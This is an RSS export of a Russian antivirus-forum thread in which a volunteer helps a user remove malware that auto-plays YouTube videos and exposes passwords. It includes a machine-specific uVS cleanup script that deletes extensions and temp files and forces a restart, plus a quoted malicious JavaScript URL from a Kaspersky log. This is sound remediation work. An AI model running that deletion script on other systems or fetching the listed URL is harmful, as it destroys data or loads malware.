<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: Неуловимый вирус. Автоматически просматривает видео в ютубе.]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме Неуловимый вирус. Автоматически просматривает видео в ютубе. форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Wed, 29 Apr 2026 04:36:16 +0300</pubDate>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114432/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_N7UHWKVu" href="/user/80765/" bx-tooltip-user-id="80765">Kot Obormot</a> написал:<br />Все равно лучше рассмотреть турецкие антивирусы<br />=============<br /><br />В Турции можно и лицензию ESET купить - на Турцию санкции пока не распространяться. :)<br />Из Российского - Kasper. <br />
			<i>19.08.2022 15:31:37, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114432/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114432/</guid>
			<pubDate>Fri, 19 Aug 2022 15:31:37 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114431/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Спасибо большое за помощь! Значимые пароли поменял. Только вопрос остался со страной проживания. Я проживаю в Турции, но почему-то мне кажется, что антивирусы РФ будут получше в целом (не факт, что именно для меня лучше). Я обычно по русскоязычным сайтам информацию ищу. Все равно лучше рассмотреть турецкие антивирусы, даже если я, бывает, пользуюсь VPN? <br />
			<i>19.08.2022 14:44:00, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114431/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114431/</guid>
			<pubDate>Fri, 19 Aug 2022 14:44:00 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114428/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_Jc4xXdKn" href="/user/80765/" bx-tooltip-user-id="80765">Kot Obormot</a> написал:<br />1) Скажите, пожалуйста, стоит ли все те программы, которые я устанавливал недавно для сканирования - удалять или лучше оставить на всякий случай? Если какие-то стоит удалить (например, со всеми следами), то что будет с теми файлами, которые были в них помещены в карантин? (они тоже удалятся автоматически?)<br />=============<br /><br />Программы постоянно обновляются и в случае чего - всё равно нужна будет актуальная версия программы ( старая может что-то и не увидеть )<br />Можно для себя оставить\составить список программ и ссылок на них.<br />Обычно программы ( постоянно ) нужны тем кто с ними работает.<br /><br />Если файлы у программы на карантине - при удалении программы - программа удалит и все файлы карантина. ( файлы на карантине и сами по себе не опасны - современные антивирусы при помещении их на карантин - шифруют ( т.е. это уже совсем другие файлы ) )<br /><br /><br /><br />====quote====<br /><a class="blog-p-user-name" id="bp_Ub3EpkIm" href="/user/80765/" bx-tooltip-user-id="80765">Kot Obormot</a> написал:<br />2) Можно уже все пароли менять?) И стоит ли доверять сохранять пароли антивирусам, как считаете? А то антивирусы предлагают password manager устанавливать для безопасности.<br />=============<br /><br />Всё что можно было почистить - почистили. Так что, рекомендую пароли сменить.<br />Доверять ли антивирусам ?<br />Вы доверяете браузеру... Антивирус в 100 раз надёжнее. ( но желательно работать с антивирусом &nbsp;той страны в которой вы проживаете ).<br />И читайте отзывы - на независимых сайтах.<br />+ <br />Нужно понимать что и как - чтобы не остаться без паролей.<br />---------------<br /><br />По проверке веб адресов: На <noindex><a href="https://www.virustotal.com/gui/home/url" target="_blank" rel="nofollow">https://www.virustotal.com/gui/home/url</a></noindex><br />есть проверка url<br /><br />---------------<br />Есть программы липовые - т.е. некто берёт программу ХХХ меняет её и выкладывает в сеть... <br /><br />т.е. Mozilla Firefox ( и другие браузеры и программы ) нужно _всегда обновлять с официальных сайтов.<br />И\или брать ссылки на тех сайтах которым можно доверять: <noindex><a href="https://www.comss.ru/list.php?c=browsers" target="_blank" rel="nofollow">https://www.comss.ru/list.php?c=browsers</a></noindex><br />---------------<br />+ <br />Можно почитать: <noindex><a href="http://pchelpforum.ru/f26/t141222/" target="_blank" rel="nofollow">http://pchelpforum.ru/f26/t141222/</a></noindex> <br />
			<i>18.08.2022 23:04:29, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114428/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114428/</guid>
			<pubDate>Thu, 18 Aug 2022 23:04:29 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114425/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Хотел обновить все браузеры. Но у них итак последние версии оказались. Только вот с браузером mozila firefox возникли проблемы.<br />Касперский начал ругаться при запуске браузера. Вот что он пишет (из отчета). По-моему эта история была еще очень давно, потому я даже забыл, что на firefox у меня и раньше антивирус ругался.<br /><br />Событие: Загрузка остановлена<br />Пользователь: DESKTOP-DKCSHOQ\e8921<br />Тип пользователя: Активный пользователь<br />Имя программы: firefox.exe<br />Путь к программе: C:\Program Files (x86)\Mozilla Firefox<br />Компонент: Веб-Антивирус<br />Описание результата: Запрещено<br />Тип: Возможна неправомерная загрузка ПО<br />Название: <noindex><a href="https://s3.amazonaws.com/publicjs/21b344a7264ba4c14a.js" target="_blank" rel="nofollow">https://s3.amazonaws.com/publicjs/21b344a7264ba4c14a.js</a></noindex><br />Степень угрозы: Высокая<br />Тип объекта: Веб-страница<br />Имя объекта: 21b344a7264ba4c14a.js<br />Путь к объекту: <noindex><a href="https://s3.amazonaws.com/publicjs" target="_blank" rel="nofollow">https://s3.amazonaws.com/publicjs</a></noindex><br />Причина: Облачная защита <br />
			<i>18.08.2022 20:14:15, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114425/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114425/</guid>
			<pubDate>Thu, 18 Aug 2022 20:14:15 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114424/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Хорошо, спасибо большое! Я просто всю папку (50 GB) загрузок удалил, все равно я ей не пользовался почти совсем) Все удалилось без проблем (минуя корзину) shift+delete+enter. <br /><br />В принципе, с точки зрения работоспособности системы, все отлично и быстро &nbsp;работает, ничего лишнего не открывается, еще меньше стал греться ноутбук почему-то (может, конечно, мне показалось насчет нагрева). Спасибо большое за помощь!<br /><br />1) Скажите, пожалуйста, стоит ли все те программы, которые я устанавливал недавно для сканирования - удалять или лучше оставить на всякий случай? Если какие-то стоит удалить (например, со всеми следами), то что будет с теми файлами, которые были в них помещены в карантин? (они тоже удалятся автоматически?)<br /><br />2) Можно уже все пароли менять?) И стоит ли доверять сохранять пароли антивирусам, как считаете? А то антивирусы предлагают password manager устанавливать для безопасности. <br />
			<i>18.08.2022 20:00:20, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114424/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114424/</guid>
			<pubDate>Thu, 18 Aug 2022 20:00:20 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114423/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_YvBhIP72" href="/user/80765/" bx-tooltip-user-id="80765">Kot Obormot</a> написал:<br />А во всех остальных боксах нужно убрать галочки, правильно ли я понял? (в том числе на вкладках браузер, программы итп)?<br />=============<br />------------<br />Программа работает так, что в одних местах галочки\чек боксы нужно снимать - а, в других ставить.<br />Но не нужно...<br />Просто закройте программу.<br /><br />Потом самостоятельно в C:\Users\e8921\Downloads<br />Удалите всё лишнее. <br />
			<i>18.08.2022 19:43:34, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114423/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114423/</guid>
			<pubDate>Thu, 18 Aug 2022 19:43:34 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114422/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			А во всех остальных боксах нужно убрать галочки, правильно ли я понял? (в том числе на вкладках браузер, программы итп)? Самостоятельно - значит просто удалить папку downloads, без этой программы? <br />
			<i>18.08.2022 19:40:22, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114422/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114422/</guid>
			<pubDate>Thu, 18 Aug 2022 19:40:22 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114421/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Рекомендую удалить только файлы: В C:\Users\e8921\Downloads ( самостоятельно )<br />Остальное не трогать.<br />-----------<br />Понаблюдайте - напишите, что и как. <br />
			<i>18.08.2022 19:38:17, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114421/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114421/</guid>
			<pubDate>Thu, 18 Aug 2022 19:38:17 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114420/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Сделал, готово. Можно ли нажимать &quot;clean&quot;?) <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=122996">для_архива.zip</a><br /><i>18.08.2022 19:23:34, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114420/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114420/</guid>
			<pubDate>Thu, 18 Aug 2022 19:23:34 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114419/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_Vc32vnIy" href="/user/80765/" bx-tooltip-user-id="80765">Kot Obormot</a> написал:<br />А нужно ли галочки на всех Malware related fixes?<br />=============<br />Это ( сейчас ) не нужно трогать.<br />Там:<br />Очистка временных файлов ( папки Temp ) - это мы почистили<br />Проверка диска на ошибки.<br />и т.д. - Это не нужно.<br />------------<br />Желательно посмотреть все вкладки - снимки. ( можно все фото в архив ) и одним файлом на форум. <br />
			<i>18.08.2022 19:14:02, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114419/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114419/</guid>
			<pubDate>Thu, 18 Aug 2022 19:14:02 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114418/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Спасибо большое!<br /><br /><img src="https://i.ibb.co/jhy8HQ8/image.png" alt="Пользователь добавил изображение" border="0" /><br /><br />Вот что нашлось! Нужно ли что-то еще заскринить?<br />Там есть вкладки с браузерами, программами и автостарта. Но там много всего, часть боксов с галочками, часть без. А нужно ли галочки на всех Malware related fixes? <br />
			<i>18.08.2022 18:54:11, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114418/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114418/</guid>
			<pubDate>Thu, 18 Aug 2022 18:54:11 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114417/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Можно ещё этим почистить: <noindex><a href="https://www.comss.ru/page.php?id=2421" target="_blank" rel="nofollow">https://www.comss.ru/page.php?id=2421</a></noindex><br />Но... там нужно внимательно смотреть - что будет предложено к удалению.<br />Так - что будут нужны снимки вкладок с найденным. ( ЧТОБЫ ВСЁ БЫЛО ВИДНО :) )<br />+<br />Обновите все браузеры ( если есть доступные обновления ) ( даже те браузеры которые у вас стоят - но вы с ними не работаете )<br />И потом ( после всего :) ) - Желательно изменить пароли. <br />
			<i>18.08.2022 18:40:19, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114417/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114417/</guid>
			<pubDate>Thu, 18 Aug 2022 18:40:19 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114416/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Сделал, вроде бы так, вирусы какие-то нашлись))) У autoruns поменял расширение, чтобы можно было сюда загрузить) .arn сюда не грузится<br /><br />Вирусы я поместил на карантин. Кстати, если я потом удалю эту программу, то вирусы вместе с карантином - тоже удалятся?)<br /><br />Интересно, что я ради интереса провел еще одно сканирование, еще один вирус нашелся. Третья проверка 0 угроз!<br /><br /><img src="https://i.ibb.co/BKP2jfv/Screenshot-18.png" alt="Пользователь добавил изображение" border="0" /> <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=122993">malware.txt</a><br /><a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=122994">autoruns_log.txt</a><br /><a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=122995">Вторая_проверка.txt</a><br /><i>18.08.2022 18:11:25, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114416/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114416/</guid>
			<pubDate>Thu, 18 Aug 2022 18:11:25 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114415/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Далее &nbsp;выполните лог программой Malwarebytes &nbsp;( Kasper - на время установки Malwarebytes - отключите )<br /><noindex><a href="http://forum.esetnod32.ru/forum9/topic10688/" target="_blank" rel="nofollow">http://forum.esetnod32.ru/forum9/topic10688/</a></noindex><br /><br />Выберите вариант сканирования: Быстрое или Полное сканирование.<br />Отчет предоставить для анализа ( в своей теме на форуме ).<br />Отчёт нужно предоставить в .txt ( блокнот )<br /><br />+<br />Сделайте &nbsp;комплексный лог Autoruns ( отчёт сюда &nbsp;)<br /><noindex><a href="https://safezone.cc/threads/kak-podgotovit-log-autoruns.30173/" target="_blank" rel="nofollow">https://safezone.cc/threads/kak-podgotovit-log-autoruns.30173/</a></noindex> <br />
			<i>18.08.2022 17:36:29, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114415/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114415/</guid>
			<pubDate>Thu, 18 Aug 2022 17:36:29 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114414/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Спасибо. На uvS ругался антивирус (то, что это троян), но я все равно сделал! <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=122992">Fixlog.txt</a><br /><i>18.08.2022 17:26:57, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114414/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114414/</guid>
			<pubDate>Thu, 18 Aug 2022 17:26:57 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114413/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			1) Сохраните &nbsp;файл: &nbsp;fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:<br /><br />Запустите FRST и нажмите один раз на кнопку Fix и подождите.<br /><br />Программа FRST создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!<br /><br />2) Скопируйте текст КОДа - в буфер обмена.<br />uVS: start.exe, текущий пользователь, меню, скрипты - выполнить скрипт из буфера обмена.<br />ПЕРЕД ВЫПОЛНЕНИЕМ СКРИПТА, ЗАКРЫТЬ БРАУЗЕРЫ!<br />ВНИМАНИЕ : По окончанию выполнения скрипта компьютер выполнит перезагрузку !<br /><br /><br />
====code====
<pre>
;uVS v4.11.12 &#91;http://dsrt.dyndns.org:8888&#93;
;Target OS: NTv11.0
v400c
OFFSGNSAVE
deltmp
restart
;---------command-block---------
delref {159FF5D5-55F1-4D2F-B706-767A55F77ABB}&#92;&#91;CLSID&#93;
delref {1DAC0C53-7D23-4AB3-856A-B04D98CD982A}&#92;&#91;CLSID&#93;
delref %SystemDrive%&#92;PROGRAM FILES&#92;BITDEFENDER&#92;BITDEFENDER SECURITY&#92;BDWTEFF.XPI
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;KASPERSKY LAB&#92;KASPERSKY TOTAL SECURITY 21.3&#92;FFEXT&#92;LIGHT_PLUGIN_FIREFOX&#92;ADDON.XPI
delref %SystemDrive%&#92;PROGRAM FILES&#92;COMMON FILES&#92;BITDEFENDER&#92;SETUPINFORMATION&#92;CL-26-A25B50FF-7E42-4637-AA3A-4C71F23F8B3A&#92;SETUPLAUNCHER.EXE
delref %Sys32%&#92;DRIVERSTORE&#92;FILEREPOSITORY&#92;NVIVI.INF_AMD64_285E9249015A7F10&#92;DISPLAY.NVCONTAINER&#92;NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F %PROGRAMDATA%&#92;NVIDIA&#92;NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:&#92;WINDOWS&#92;SYSTEM32&#92;DRIVERSTORE&#92;FILEREPOSITORY&#92;NVIVI.INF_AMD64_285E9249015A7F10&#92;DISPLAY.NVCONTAINER&#92;PLUGINS&#92;LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM&#92;LOCALSYSTEM
delref %SystemDrive%&#92;USERS&#92;E8921&#92;APPDATA&#92;ROAMING&#92;MOZILLA&#92;FIREFOX&#92;PROFILES&#92;XA43K758.DEFAULT&#92;EXTENSIONS&#92;VB@YANDEX.RU.XPI
delref %SystemDrive%&#92;USERS&#92;E8921&#92;APPDATA&#92;ROAMING&#92;MOZILLA&#92;FIREFOX&#92;PROFILES&#92;XA43K758.DEFAULT&#92;EXTENSIONS&#92;SOVETNIK@METABAR.RU.XPI
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;MICROSOFT&#92;EDGEUPDATE&#92;1.3.165.21&#92;PSMACHINE_64.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERSTORE&#92;FILEREPOSITORY&#92;IGDLH64.INF_AMD64_2681FC9DEDD95CD9&#92;IGFXEXPS32.DLL
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;MICROSOFT&#92;EDGEUPDATE&#92;1.3.165.21&#92;PSMACHINE.DLL
delref %SystemRoot%&#92;SYSWOW64&#92;DRIVERSTORE&#92;FILEREPOSITORY&#92;NVIVI.INF_AMD64_285E9249015A7F10&#92;NVDECMFTMJPEG.DLL
delref D:&#92;CHROME PORTABLE&#92;GOOGLECHROMEPORTABLE64&#92;APP&#92;CHROME-BIN&#92;CHROME.EXE
delref %SystemDrive%&#92;USERS&#92;E8921&#92;APPDATA&#92;ROAMING&#92;ACESTREAM&#92;PLAYER&#92;NPACE_PLUGIN.DLL
delref %SystemDrive%&#92;USERS&#92;E8921&#92;APPDATA&#92;ROAMING&#92;ACESTREAM&#92;EXTENSIONS&#92;AWE&#92;FIREFOX&#92;ACEWEBEXTENSION_UNLISTED.XPI
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;GOOGLE&#92;CHROME&#92;APPLICATION&#92;CHROME.EXE
delref D:&#92;CHROME PORTABLE&#92;GOOGLECHROMEPORTABLE64&#92;APP&#92;CHROME-BIN&#92;CHROME_PROXY.EXE
delref CLIENTS2.GOOGLE.COM
delref %SystemDrive%&#92;USERS&#92;E8921&#92;&#92;LOCAL SETTINGS&#92;APPLICATION DATA&#92;YANDEX&#92;YANDEXBROWSER&#92;USER DATA&#92;DEFAULT&#92;EXTENSIONS&#92;HELPER@SAVEFROM.NET.CRX
delall %SystemDrive%&#92;USERS&#92;E8921&#92;APPDATA&#92;ROAMING&#92;MOZILLA&#92;FIREFOX&#92;PROFILES&#92;XA43K758.DEFAULT&#92;EXTENSIONS&#92;SOVETNIK-YANDEX@YANDEX.RU.XPI
apply



</pre>
============= <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=122991">fixlist.txt</a><br /><i>18.08.2022 16:32:58, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114413/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114413/</guid>
			<pubDate>Thu, 18 Aug 2022 16:32:58 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114412/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Спасибо. Я постарался часть скриптов перенести на флешку, которой буду изредка пользоваться. <br /><br />Я могу постараться много поудалять ненужных программ и скриптов, просто знать бы какие именно) <br />
			<a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=122986">FRST.txt</a><br /><a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=122987">Addition.txt</a><br /><a href="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=122988">DESKTOP-DKCSHOQ_2022-08-18_15-20-01_v4.12.7z</a><br /><i>18.08.2022 15:24:38, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114412/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114412/</guid>
			<pubDate>Thu, 18 Aug 2022 15:24:38 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114411/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Kot Obormot<br /><br />У вас одних ярлыков в системе 900<br />Более 200 ( только непроверенных ) скриптов.<br />И более 130 установленных программ...<br />--------<br />Нужен новый образ автозапуска в uVS<br />и Лог в FRST<br />будем удалять всё... подозрительное. <br />
			<i>18.08.2022 13:46:54, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114411/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114411/</guid>
			<pubDate>Thu, 18 Aug 2022 13:46:54 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114410/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Спасибо! Но есть еще одна проблема. Теперь браузер Chrome показывает, что у меня часть паролей было &quot;раскрыто&quot;, это около 10-15% от всех паролей. Часть из них были повторяющиеся, а часть простые. Половина 1 день назад, а половина 10 часов назад, после удаления controle.vbs. Видимо вирус все еще не дремлет((( <br />
			<i>18.08.2022 12:58:37, Kot Obormot.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114410/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16868/message114410/</guid>
			<pubDate>Thu, 18 Aug 2022 12:58:37 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Неуловимый вирус. Автоматически просматривает видео в ютубе.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16868/message114403/">Неуловимый вирус. Автоматически просматривает видео в ютубе.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			+<br />Если тема по вирусам\рекламе интересна.<br /><noindex><a href="https://forum.esetnod32.ru/forum8/topic15785/" target="_blank" rel="nofollow">https://forum.esetnod32.ru/forum8/topic15785/</a></noindex> <br />
			<i>17.08.2022 18:31:36, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16868/message114403/</link>
